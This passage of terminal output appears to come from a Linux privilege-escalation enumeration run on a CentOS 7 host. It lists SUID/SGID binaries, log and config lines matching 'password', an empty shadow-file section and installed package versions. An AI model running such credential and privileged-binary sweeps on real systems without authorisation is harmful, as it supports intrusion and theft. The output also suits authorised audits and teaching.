  4333. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/roster
  4334. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/subscribe
  4335. -rwxr-sr-x 1 root mailman 15592 Jun 24 2015 /usr/lib/mailman/mail/mailman
  4336. -r-sr-xr-x 1 root root 9532 Mar 26 2017 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
  4337. -r-sr-xr-x 1 root root 14320 Mar 26 2017 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
  4338. -rwsr-x--- 1 root dbus 318424 Nov 6 2016 /usr/lib64/dbus-1/dbus-daemon-launch-helper
  4339. -rwx--s--x. 1 root utmp 11192 Jun 10 2014 /usr/libexec/utempter/utempter
  4340. ---x--s--x 1 root ssh_keys 461496 Apr 12 2017 /usr/libexec/openssh/ssh-keysign
  4341. drwxr-sr-x 2 programacion programacion 4096 May 15 2014 /home/servertest/svn
  4342.  
  4343. [+] Logs containing keyword 'password'
  4344. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp.log:CommAmqpListener: [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4345. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp.log:CommAmqpListener: [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4346. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|CApplicationContext|initialize|66|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4347. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|AmqpListenerWorker|run|71|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4348. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|AmqpListenerWorker|run|79|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4349. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|CommAmqpListener|main|127|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4350. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|CApplicationContext|initialize|66|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4351. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|AmqpListenerWorker|run|71|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4352. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|AmqpListenerWorker|run|79|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4353. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|CommAmqpListener|main|127|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  4354.  
  4355. [+] Config files containing keyword 'password'
  4356. /etc/pki/tls/openssl.cnf:# input_password = secret
  4357. /etc/pki/tls/openssl.cnf:# output_password = secret
  4358. /etc/pki/tls/openssl.cnf:challengePassword = A challenge password
  4359. /etc/httpd/conf.d/ssl.conf:# Note that no password is obtained from the user. Every entry in the user
  4360. /etc/httpd/conf.d/ssl.conf:# file needs this password: `xxj31ZMTZzkVA'.
  4361. /etc/dnsmasq.conf:#dhcp-option=encap:175, 191, pass # iSCSI password
  4362. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  4363. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  4364. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  4365. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  4366. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  4367. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  4368. /etc/security/pwquality.conf:# Configuration for systemwide password quality limits
  4369. /etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the
  4370. /etc/security/pwquality.conf:# old password.
  4371. /etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if
  4372. /etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0
  4373. /etc/security/pwquality.conf:# it is the minimum number of digits in the new password.
  4374. /etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password.
  4375. /etc/security/pwquality.conf:# password.
  4376. /etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password.
  4377. /etc/security/pwquality.conf:# password.
  4378. /etc/security/pwquality.conf:# The maximum credit for having other characters in the new password.
  4379. /etc/security/pwquality.conf:# password.
  4380. /etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others).
  4381. /etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password.
  4382. /etc/security/pwquality.conf:# new password.
  4383. /etc/pear.conf:a:30:{s:9:"cache_dir";s:19:"/var/cache/php-pear";s:15:"default_channel";s:12:"pear.php.net";s:16:"preferred_mirror";s:12:"pear.php.net";s:13:"remote_config";s:0:"";s:13:"auto_discover";i:0;s:13:"master_server";s:12:"pear.php.net";s:7:"php_dir";s:15:"/usr/share/pear";s:12:"metadata_dir";s:13:"/var/lib/pear";s:7:"doc_dir";s:19:"/usr/share/doc/pear";s:7:"bin_dir";s:8:"/usr/bin";s:8:"data_dir";s:20:"/usr/share/pear-data";s:7:"cfg_dir";s:9:"/etc/pear";s:7:"www_dir";s:13:"/var/www/html";s:8:"test_dir";s:21:"/usr/share/tests/pear";s:8:"temp_dir";s:8:"/var/tmp";s:12:"download_dir";s:18:"/tmp/pear/download";s:7:"php_bin";s:12:"/usr/bin/php";s:10:"php_prefix";s:0:"";s:10:"php_suffix";s:0:"";s:7:"php_ini";s:0:"";s:8:"username";s:0:"";s:8:"password";s:0:"";s:7:"verbose";i:1;s:15:"preferred_state";s:6:"stable";s:5:"umask";i:18;s:9:"cache_ttl";i:3600;s:8:"sig_type";s:3:"gpg";s:7:"sig_bin";s:12:"/usr/bin/gpg";s:9:"sig_keyid";s:0:"";s:10:"sig_keydir";s:13:"/etc/pearkeys";}
  4384. /etc/dovecot/conf.d/10-auth.conf:# We also try to handle password changes automatically: If user's previous
  4385. /etc/dovecot/conf.d/10-auth.conf:# TTL for negative hits (user not found, password mismatch).
  4386. /etc/dovecot/conf.d/10-auth.conf:# Password database is used to verify user's password (and nothing more).
  4387. /etc/dovecot/conf.d/10-auth.conf:#!include auth-checkpassword.conf.ext
  4388. /etc/dovecot/conf.d/10-logging.conf:# In case of password mismatches, log the attempted password. Valid values are
  4389. /etc/dovecot/conf.d/10-logging.conf:# no, plain and sha1. sha1 can be useful for detecting brute force password
  4390. /etc/dovecot/conf.d/10-logging.conf:# attempts vs. user simply trying the same password over and over again.
  4391. /etc/dovecot/conf.d/10-logging.conf:#auth_verbose_passwords = no
  4392. /etc/dovecot/conf.d/10-logging.conf:# In case of password mismatches, log the passwords and used scheme so the
  4393. /etc/dovecot/conf.d/10-logging.conf:#auth_debug_passwords = no
  4394. /etc/dovecot/conf.d/10-ssl.conf:# If key file is password protected, give the password here. Alternatively
  4395. /etc/dovecot/conf.d/10-ssl.conf:# root owned 0600 file by using ssl_key_password = <path.
  4396. /etc/dovecot/conf.d/10-ssl.conf:#ssl_key_password =
  4397. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# Authentication for checkpassword users. Included from 10-auth.conf.
  4398. /etc/dovecot/conf.d/auth-checkpassword.conf.ext: driver = checkpassword
  4399. /etc/dovecot/conf.d/auth-checkpassword.conf.ext: args = /usr/bin/checkpassword
  4400. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# Standard checkpassword doesn't support direct userdb lookups.
  4401. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# If you need checkpassword userdb, the checkpassword must support
  4402. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# driver = checkpassword
  4403. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# args = /usr/bin/checkpassword
  4404. /etc/dovecot/conf.d/auth-static.conf.ext:# username or the password, or if there is a single password for all users:
  4405. /etc/dovecot/conf.d/auth-static.conf.ext:# - proxy frontend, where the backend verifies the password
  4406. /etc/dovecot/conf.d/auth-static.conf.ext:# - proxy backend, where the frontend already verified the password
  4407. /etc/dovecot/conf.d/auth-static.conf.ext:# args = proxy=y host=%1Mu.example.com nopassword=y
  4408. /etc/dovecot/conf.d/auth-static.conf.ext:# args = password=test
  4409. /etc/dovecot/conf.d/auth-system.conf.ext:# Shadow passwords for system users (NSS, /etc/shadow or similiar).
  4410. /etc/mailman/sitelist.cfg:# subscribed with. user_password - The user's password. user_name - The
  4411. /etc/mailman/sitelist.cfg:# password authentication.
  4412. /etc/zabbix/zabbix_agentd.conf:### Change -u<username> and add -p<password> if required
  4413.  
  4414. [+] Shadow File (Privileged)
  4415.  
  4416. [*] ENUMERATING PROCESSES AND APPLICATIONS...
  4417.  
  4418. [+] Installed Packages
  4419. GConf2-3.2.6-8.el7.x86_64
  4420. GeoIP-1.5.0-11.el7.x86_64
  4421. ImageMagick-6.7.8.9-15.el7_2.x86_64
  4422. ModemManager-glib-1.6.0-2.el7.x86_64
  4423. NetworkManager-1.4.0-20.el7_3.x86_64
  4424. NetworkManager-glib-1.4.0-20.el7_3.x86_64
  4425. NetworkManager-libnm-1.4.0-20.el7_3.x86_64
  4426. NetworkManager-tui-1.4.0-20.el7_3.x86_64
  4427. OpenEXR-libs-1.7.1-7.el7.x86_64
  4428. acl-2.2.51-12.el7.x86_64
  4429. adwaita-cursor-theme-3.14.1-1.el7.noarch
  4430. adwaita-icon-theme-3.14.1-1.el7.noarch
  4431. aic94xx-firmware-30-6.el7.noarch
  4432. alsa-firmware-1.0.28-2.el7.noarch
  4433. alsa-lib-1.1.1-1.el7.x86_64
  4434. alsa-tools-firmware-1.1.0-1.el7.x86_64
  4435. apr-1.4.8-3.el7.x86_64
  4436. apr-util-1.5.2-6.el7.x86_64
  4437. at-spi2-atk-2.14.1-1.el7.x86_64
  4438. at-spi2-core-2.14.1-2.el7.x86_64
  4439. atk-2.14.0-1.el7.x86_64
  4440. audit-2.6.5-3.el7_3.1.x86_64
  4441. audit-libs-2.6.5-3.el7_3.1.x86_64
  4442. authconfig-6.2.8-14.el7.x86_64
  4443. avahi-0.6.31-17.el7.x86_64
  4444. avahi-autoipd-0.6.31-17.el7.x86_64
  4445. avahi-libs-0.6.31-17.el7.x86_64
  4446. awstats-7.6-3.1.el7.noarch
  4447. basesystem-10.0-7.el7.centos.noarch
  4448. bash-4.2.46-21.el7_3.x86_64
  4449. bind-9.9.4-50.el7_3.1.x86_64
  4450. bind-libs-9.9.4-50.el7_3.1.x86_64
  4451. bind-libs-lite-9.9.4-50.el7_3.1.x86_64
  4452. bind-license-9.9.4-50.el7_3.1.noarch
  4453. bind-utils-9.9.4-50.el7_3.1.x86_64
  4454. binutils-2.25.1-22.base.el7.x86_64
  4455. biosdevname-0.7.2-1.el7.x86_64
  4456. btrfs-progs-4.4.1-1.el7.x86_64
  4457. bzip2-1.0.6-13.el7.x86_64
  4458. bzip2-libs-1.0.6-13.el7.x86_64
  4459. ca-certificates-2017.2.14-70.1.el7_3.noarch
  4460. cairo-1.14.2-1.el7.x86_64
  4461. cairo-gobject-1.14.2-1.el7.x86_64
  4462. centos-logos-70.0.6-3.el7.centos.noarch
  4463. centos-release-7-3.1611.el7.centos.x86_64
  4464. chkconfig-1.7.2-1.el7_3.1.x86_64
  4465. clamav-0.99.2-3.el7.centos.vm.x86_64
  4466. clamav-data-0.99.2-3.el7.centos.vm.noarch
  4467. clamav-filesystem-0.99.2-3.el7.centos.vm.noarch
  4468. clamav-lib-0.99.2-3.el7.centos.vm.x86_64
  4469. clamav-scanner-0.99.2-3.el7.centos.vm.noarch
  4470. clamav-scanner-systemd-0.99.2-3.el7.centos.vm.noarch
  4471. clamav-server-0.99.2-3.el7.centos.vm.x86_64
  4472. clamav-server-systemd-0.99.2-3.el7.centos.vm.noarch
  4473. clamav-update-0.99.2-3.el7.centos.vm.x86_64
  4474. clucene-core-2.3.3.4-11.el7.x86_64
  4475. colord-libs-1.2.7-2.el7.x86_64
  4476. coreutils-8.22-18.el7.x86_64
  4477. cpio-2.11-24.el7.x86_64
  4478. cracklib-2.9.0-11.el7.x86_64
  4479. cracklib-dicts-2.9.0-11.el7.x86_64
  4480. cronie-1.4.11-14.el7_2.1.x86_64
  4481. cronie-anacron-1.4.11-14.el7_2.1.x86_64
  4482. crontabs-1.11-6.20121102git.el7.noarch
  4483. cryptsetup-libs-1.7.2-1.el7.x86_64
  4484. cups-libs-1.6.3-26.el7.x86_64
  4485. curl-7.29.0-35.el7.centos.x86_64
  4486. cyrus-sasl-2.1.26-20.el7_2.x86_64
  4487. cyrus-sasl-gssapi-2.1.26-20.el7_2.x86_64
  4488. cyrus-sasl-lib-2.1.26-20.el7_2.x86_64
  4489. cyrus-sasl-md5-2.1.26-20.el7_2.x86_64
  4490. cyrus-sasl-plain-2.1.26-20.el7_2.x86_64
  4491. dbus-1.6.12-17.el7.x86_64
  4492. dbus-glib-0.100-7.el7.x86_64
  4493. dbus-libs-1.6.12-17.el7.x86_64
  4494. dbus-python-1.1.1-9.el7.x86_64
  4495. dejavu-fonts-common-2.33-6.el7.noarch
  4496. dejavu-sans-mono-fonts-2.33-6.el7.noarch
  4497. desktop-file-utils-0.22-1.el7.x86_64
  4498. device-mapper-1.02.135-1.el7_3.5.x86_64
  4499. device-mapper-event-1.02.135-1.el7_3.5.x86_64
  4500. device-mapper-event-libs-1.02.135-1.el7_3.5.x86_64
  4501. device-mapper-libs-1.02.135-1.el7_3.5.x86_64
  4502. device-mapper-persistent-data-0.6.3-1.el7.x86_64
  4503. dhclient-4.2.5-47.el7.centos.x86_64
  4504. dhcp-common-4.2.5-47.el7.centos.x86_64
  4505. dhcp-libs-4.2.5-47.el7.centos.x86_64
  4506. diffutils-3.3-4.el7.x86_64
  4507. dmidecode-3.0-2.1.el7_3.x86_64
  4508. dnsmasq-2.66-21.el7.x86_64
  4509. dovecot-2.2.10-7.el7.x86_64
  4510. dracut-033-463.el7_3.2.x86_64
  4511. dracut-config-rescue-033-463.el7_3.2.x86_64
  4512. dracut-network-033-463.el7_3.2.x86_64
  4513. e2fsprogs-1.42.9-9.el7.x86_64
  4514. e2fsprogs-libs-1.42.9-9.el7.x86_64
  4515. ebtables-2.0.10-15.el7.x86_64
  4516. elfutils-libelf-0.166-2.el7.x86_64
  4517. elfutils-libs-0.166-2.el7.x86_64
  4518. emacs-24.3-19.el7_3.x86_64
  4519. emacs-common-24.3-19.el7_3.x86_64
  4520. emacs-filesystem-24.3-19.el7_3.noarch
  4521. epel-release-7-9.noarch
  4522. ethtool-4.5-3.el7.x86_64
  4523. expat-2.1.0-10.el7_3.x86_64
  4524. file-5.11-33.el7.x86_64
  4525. file-libs-5.11-33.el7.x86_64
  4526. filesystem-3.2-21.el7.x86_64
  4527. findutils-4.5.11-5.el7.x86_64
  4528. fipscheck-1.4.1-5.el7.x86_64
  4529. fipscheck-lib-1.4.1-5.el7.x86_64
  4530. firewalld-0.4.3.2-8.1.el7_3.3.noarch
  4531. firewalld-filesystem-0.4.3.2-8.1.el7_3.3.noarch
  4532. fontconfig-2.10.95-10.el7.x86_64
  4533. fontpackages-filesystem-1.44-8.el7.noarch
  4534. freetype-2.4.11-12.el7.x86_64
  4535. fxload-2002_04_11-16.el7.x86_64
  4536. gawk-4.0.2-4.el7_3.1.x86_64
  4537. gd-2.0.35-26.el7.x86_64
  4538. gdbm-1.10-8.el7.x86_64
  4539. gdbm-devel-1.10-8.el7.x86_64
  4540. gdk-pixbuf2-2.31.6-3.el7.x86_64
  4541. gettext-0.18.2.1-4.el7.x86_64
  4542. gettext-libs-0.18.2.1-4.el7.x86_64
  4543. ghostscript-9.07-20.el7_3.7.x86_64
  4544. ghostscript-fonts-5.50-32.el7.noarch
  4545. giflib-4.1.6-9.el7.x86_64
  4546. glib-networking-2.42.0-1.el7.x86_64
  4547. glib2-2.46.2-4.el7.x86_64
  4548. glibc-2.17-157.el7_3.4.x86_64
  4549. glibc-common-2.17-157.el7_3.4.x86_64
  4550. glibc-devel-2.17-157.el7_3.4.x86_64
  4551. glibc-headers-2.17-157.el7_3.4.x86_64
  4552. gmp-6.0.0-12.el7_1.x86_64
  4553. gnupg2-2.0.22-4.el7.x86_64
  4554. gnutls-3.3.24-1.el7.x86_64
  4555. gobject-introspection-1.42.0-1.el7.x86_64
  4556. gpg-pubkey-11f63c51-3c7dc11d
  4557. gpg-pubkey-352c64e5-52ae6884
  4558. gpg-pubkey-8fae34bd-538f1e51
  4559. gpg-pubkey-a0bdbcf9-42d1d837
  4560. gpg-pubkey-f4a80eb5-53a7ff4b
  4561. gpgme-1.3.2-5.el7.x86_64
  4562. graphite2-1.3.6-1.el7_2.x86_64
  4563. grep-2.20-2.el7.x86_64
  4564. groff-base-1.22.2-8.el7.x86_64
  4565. grub2-2.02-0.44.el7.centos.x86_64
  4566. grub2-tools-2.02-0.44.el7.centos.x86_64
  4567. grubby-8.28-21.el7_3.x86_64
  4568. gsettings-desktop-schemas-3.14.2-1.el7.x86_64
  4569. gtk3-3.14.13-20.el7_3.1.x86_64
  4570. gzip-1.5-8.el7.x86_64
  4571. hardlink-1.0-19.el7.x86_64
  4572. harfbuzz-0.9.36-1.el7.x86_64
  4573. hicolor-icon-theme-0.12-7.el7.noarch
  4574. hostname-3.13-3.el7.x86_64
  4575. httpd-2.4.6-45.el7.centos.4vm.x86_64
  4576. httpd-tools-2.4.6-45.el7.centos.4vm.x86_64
  4577. hwdata-0.252-8.4.el7.x86_64
  4578. ilmbase-1.0.3-7.el7.x86_64
  4579. info-5.1-4.el7.x86_64
  4580. initscripts-9.49.37-1.el7_3.1.x86_64
  4581. iproute-3.10.0-74.el7.x86_64
  4582. iprutils-2.4.13.1-1.el7.x86_64
  4583. ipset-6.19-6.el7.x86_64
  4584. ipset-libs-6.19-6.el7.x86_64
  4585. iptables-1.4.21-17.el7.x86_64
  4586. iputils-20160308-8.el7.x86_64
  4587. irqbalance-1.0.7-6.el7_3.1.x86_64
  4588. ivtv-firmware-20080701-26.el7.noarch
  4589. iwl100-firmware-39.31.5.1-49.el7.noarch
  4590. iwl1000-firmware-39.31.5.1-49.el7.noarch
  4591. iwl105-firmware-18.168.6.1-49.el7.noarch
  4592. iwl135-firmware-18.168.6.1-49.el7.noarch
  4593. iwl2000-firmware-18.168.6.1-49.el7.noarch
  4594. iwl2030-firmware-18.168.6.1-49.el7.noarch
  4595. iwl3160-firmware-22.0.7.0-49.el7.noarch
  4596. iwl3945-firmware-15.32.2.9-49.el7.noarch
  4597. iwl4965-firmware-228.61.2.24-49.el7.noarch
  4598. iwl5000-firmware-8.83.5.1_1-49.el7.noarch
  4599. iwl5150-firmware-8.24.2.2-49.el7.noarch
  4600. iwl6000-firmware-9.221.4.1-49.el7.noarch
  4601. iwl6000g2a-firmware-17.168.5.3-49.el7.noarch
  4602. iwl6000g2b-firmware-17.168.5.2-49.el7.noarch
  4603. iwl6050-firmware-41.28.5.1-49.el7.noarch
  4604. iwl7260-firmware-22.0.7.0-49.el7.noarch
  4605. jansson-2.4-6.el7.x86_64
  4606. jasper-libs-1.900.1-30.el7_3.x86_64
  4607. jbigkit-libs-2.0-11.el7.x86_64
  4608. json-c-0.11-4.el7_0.x86_64
  4609. json-glib-1.0.2-1.el7.x86_64
  4610. kbd-1.15.5-12.el7.x86_64
  4611. kbd-legacy-1.15.5-12.el7.noarch
  4612. kbd-misc-1.15.5-12.el7.noarch
  4613. kernel-3.10.0-327.28.3.el7.x86_64
  4614. kernel-3.10.0-514.10.2.el7.x86_64
  4615. kernel-3.10.0-514.2.2.el7.x86_64
  4616. kernel-3.10.0-514.26.2.el7.x86_64
  4617. kernel-3.10.0-514.6.2.el7.x86_64
  4618. kernel-headers-3.10.0-514.26.2.el7.x86_64
  4619. kernel-tools-3.10.0-514.26.2.el7.x86_64
  4620. kernel-tools-libs-3.10.0-514.26.2.el7.x86_64
  4621. kexec-tools-2.0.7-50.el7.x86_64
  4622. keyutils-libs-1.5.8-3.el7.x86_64
  4623. keyutils-libs-devel-1.5.8-3.el7.x86_64
  4624. kmod-20-9.el7.x86_64
  4625. kmod-libs-20-9.el7.x86_64
  4626. kpartx-0.4.9-99.el7_3.3.x86_64
  4627. krb5-devel-1.14.1-27.el7_3.x86_64
  4628. krb5-libs-1.14.1-27.el7_3.x86_64
  4629. lcms2-2.6-3.el7.x86_64
  4630. less-458-9.el7.x86_64
  4631. libICE-1.0.9-2.el7.x86_64
  4632. libSM-1.2.2-2.el7.x86_64
  4633. libX11-1.6.3-3.el7.x86_64
  4634. libX11-common-1.6.3-3.el7.noarch
  4635. libXau-1.0.8-2.1.el7.x86_64
  4636. libXaw-1.0.12-5.el7.x86_64
  4637. libXcomposite-0.4.4-4.1.el7.x86_64
  4638. libXcursor-1.1.14-2.1.el7.x86_64
  4639. libXdamage-1.1.4-4.1.el7.x86_64
  4640. libXevie-1.0.3-7.1.el7.x86_64
  4641. libXext-1.3.3-3.el7.x86_64
  4642. libXfixes-5.0.1-2.1.el7.x86_64
  4643. libXfont-1.5.1-2.el7.x86_64
  4644. libXft-2.3.2-2.el7.x86_64
  4645. libXi-1.7.4-2.el7.x86_64
  4646. libXinerama-1.1.3-2.1.el7.x86_64
  4647. libXmu-1.1.2-2.el7.x86_64
  4648. libXpm-3.5.11-3.el7.x86_64
  4649. libXrandr-1.4.2-2.el7.x86_64
  4650. libXrender-0.9.8-2.1.el7.x86_64
  4651. libXt-1.1.4-6.1.el7.x86_64
  4652. libXtst-1.2.2-2.1.el7.x86_64
  4653. libXxf86vm-1.1.3-2.1.el7.x86_64
  4654. libacl-2.2.51-12.el7.x86_64
  4655. libaio-0.3.109-13.el7.x86_64
  4656. libassuan-2.1.0-3.el7.x86_64
  4657. libattr-2.4.46-12.el7.x86_64
  4658. libblkid-2.23.2-33.el7_3.2.x86_64
  4659. libcap-2.22-8.el7.x86_64
  4660. libcap-ng-0.7.5-4.el7.x86_64
  4661. libcom_err-1.42.9-9.el7.x86_64
  4662. libcom_err-devel-1.42.9-9.el7.x86_64
  4663. libcroco-0.6.8-5.el7.x86_64
  4664. libcurl-7.29.0-35.el7.centos.x86_64
  4665. libdaemon-0.14-7.el7.x86_64
  4666. libdb-5.3.21-19.el7.x86_64
  4667. libdb-devel-5.3.21-19.el7.x86_64
  4668. libdb-utils-5.3.21-19.el7.x86_64
  4669. libdrm-2.4.67-3.el7.x86_64
  4670. libedit-3.0-12.20121213cvs.el7.x86_64
  4671. libestr-0.1.9-2.el7.x86_64
  4672. libevent-2.0.21-4.el7.x86_64
  4673. libffi-3.0.13-18.el7.x86_64
  4674. libfontenc-1.1.2-3.el7.x86_64
  4675. libgcc-4.8.5-11.el7.x86_64
  4676. libgcrypt-1.5.3-13.el7_3.1.x86_64
  4677. libgomp-4.8.5-11.el7.x86_64
  4678. libgpg-error-1.12-3.el7.x86_64
  4679. libgudev1-219-30.el7_3.9.x86_64
  4680. libgusb-0.1.6-3.el7.x86_64
  4681. libidn-1.28-4.el7.x86_64
  4682. libjpeg-turbo-1.2.90-5.el7.x86_64
  4683. libkadm5-1.14.1-27.el7_3.x86_64
  4684. liblockfile-1.08-17.el7.x86_64
  4685. libmemcached-1.0.16-5.el7.x86_64
  4686. libmnl-1.0.3-7.el7.x86_64
  4687. libmodman-2.0.1-8.el7.x86_64
  4688. libmount-2.23.2-33.el7_3.2.x86_64
  4689. libndp-1.2-7.el7.x86_64
  4690. libnetfilter_conntrack-1.0.6-1.el7_3.x86_64
  4691. libnfnetlink-1.0.1-4.el7.x86_64
  4692. libnl3-3.2.28-3.el7_3.x86_64
  4693. libnl3-cli-3.2.28-3.el7_3.x86_64
  4694. libotf-0.9.13-4.el7.x86_64
  4695. libpcap-1.5.3-8.el7.x86_64
  4696. libpciaccess-0.13.4-3.el7_3.x86_64
  4697. libpipeline-1.2.3-3.el7.x86_64
  4698. libpng-1.5.13-7.el7_2.x86_64
  4699. libproxy-0.4.11-10.el7.x86_64
  4700. libpwquality-1.2.3-4.el7.x86_64
  4701. librsvg2-2.39.0-1.el7.x86_64
  4702. libselinux-2.5-6.el7.x86_64
  4703. libselinux-devel-2.5-6.el7.x86_64
  4704. libselinux-python-2.5-6.el7.x86_64
  4705. libselinux-utils-2.5-6.el7.x86_64
  4706. libsemanage-2.5-5.1.el7_3.x86_64
  4707. libsepol-2.5-6.el7.x86_64
  4708. libsepol-devel-2.5-6.el7.x86_64
  4709. libsoup-2.48.1-6.el7.x86_64
  4710. libss-1.42.9-9.el7.x86_64
  4711. libssh2-1.4.3-10.el7_2.1.x86_64
  4712. libstdc++-4.8.5-11.el7.x86_64
  4713. libsysfs-2.1.0-16.el7.x86_64
  4714. libtasn1-3.8-3.el7.x86_64
  4715. libteam-1.25-4.el7.x86_64
  4716. libthai-0.1.14-9.el7.x86_64
  4717. libtiff-4.0.3-27.el7_3.x86_64
  4718. libtirpc-0.2.4-0.8.el7_3.x86_64
  4719. libtool-ltdl-2.4.2-22.el7_3.x86_64
  4720. libunistring-0.9.3-9.el7.x86_64
  4721. libusbx-1.0.20-1.el7.x86_64
  4722. libuser-0.60-7.el7_1.x86_64
  4723. libutempter-1.1.6-4.el7.x86_64
  4724. libuuid-2.23.2-33.el7_3.2.x86_64
  4725. libverto-0.2.5-4.el7.x86_64
  4726. libverto-devel-0.2.5-4.el7.x86_64
  4727. libwmf-lite-0.2.8.4-41.el7_1.x86_64
  4728. libxcb-1.11-4.el7.x86_64
  4729. libxml2-2.9.1-6.el7_2.3.x86_64
  4730. libxshmfence-1.2-1.el7.x86_64
  4731. libxslt-1.1.28-5.el7.x86_64
  4732. libyaml-0.1.4-11.el7_0.x86_64
  4733. libzip-0.10.1-8.el7.x86_64
  4734. linux-firmware-20160830-49.git7534e19.el7.noarch
  4735. lm_sensors-libs-3.4.0-4.20160601gitf9185e5.el7.x86_64
  4736. logrotate-3.8.6-12.el7.x86_64
  4737. lsscsi-0.27-4.el7.x86_64
  4738. lua-5.1.4-15.el7.x86_64
  4739. lvm2-2.02.166-1.el7_3.5.x86_64
  4740. lvm2-libs-2.02.166-1.el7_3.5.x86_64
  4741. lzo-2.06-8.el7.x86_64
  4742. m17n-db-1.6.4-3.el7.noarch
  4743. m17n-lib-1.6.4-14.el7.x86_64
  4744. mailcap-2.1.41-2.el7.noarch
  4745. mailman-2.1.15-21.el7_1.x86_64
  4746. make-3.82-23.el7.x86_64
  4747. man-db-2.6.3-9.el7.x86_64
  4748. mariadb-5.5.52-1.el7.x86_64
  4749. mariadb-devel-5.5.52-1.el7.x86_64
  4750. mariadb-libs-5.5.52-1.el7.x86_64
  4751. mariadb-server-5.5.52-1.el7.x86_64
  4752. mesa-libEGL-11.2.2-2.20160614.el7.x86_64
  4753. mesa-libGL-11.2.2-2.20160614.el7.x86_64
  4754. mesa-libgbm-11.2.2-2.20160614.el7.x86_64
  4755. mesa-libglapi-11.2.2-2.20160614.el7.x86_64
  4756. microcode_ctl-2.1-16.3.el7_3.x86_64
  4757. mlocate-0.26-6.el7.x86_64
  4758. mod_dav_svn-1.7.14-10.el7.x86_64
  4759. mod_fcgid-2.3.9-4.el7.x86_64
  4760. mod_perl-2.0.10-2.el7.x86_64
  4761. mod_ssl-2.4.6-45.el7.centos.4vm.x86_64
  4762. mozjs17-17.0.0-19.el7.x86_64
  4763. nano-2.3.1-10.el7.x86_64
  4764. ncurses-5.9-13.20130511.el7.x86_64
  4765. ncurses-base-5.9-13.20130511.el7.noarch
  4766. ncurses-libs-5.9-13.20130511.el7.x86_64
  4767. neon-0.30.0-3.el7.x86_64
  4768. net-snmp-5.7.2-24.el7_3.2.x86_64
  4769. net-snmp-agent-libs-5.7.2-24.el7_3.2.x86_64
  4770. net-snmp-libs-5.7.2-24.el7_3.2.x86_64
  4771. net-tools-2.0-0.17.20131004git.el7.x86_64
  4772. nettle-2.7.1-8.el7.x86_64
  4773. newt-0.52.15-4.el7.x86_64
  4774. newt-python-0.52.15-4.el7.x86_64
  4775. nmap-ncat-6.40-7.el7.x86_64
  4776. nspr-4.13.1-1.0.el7_3.x86_64
  4777. nss-3.28.4-1.2.el7_3.x86_64
  4778. nss-softokn-3.16.2.3-14.4.el7.x86_64
  4779. nss-softokn-freebl-3.16.2.3-14.4.el7.x86_64
  4780. nss-sysinit-3.28.4-1.2.el7_3.x86_64
  4781. nss-tools-3.28.4-1.2.el7_3.x86_64
  4782. nss-util-3.28.4-1.0.el7_3.x86_64
  4783. numactl-libs-2.0.9-6.el7_2.x86_64
  4784. openldap-2.4.40-13.el7.x86_64
  4785. openssh-6.6.1p1-35.el7_3.x86_64
  4786. openssh-clients-6.6.1p1-35.el7_3.x86_64
  4787. openssh-server-6.6.1p1-35.el7_3.x86_64
  4788. openssl-1.0.1e-60.el7_3.1.x86_64
  4789. openssl-devel-1.0.1e-60.el7_3.1.x86_64
  4790. openssl-libs-1.0.1e-60.el7_3.1.x86_64
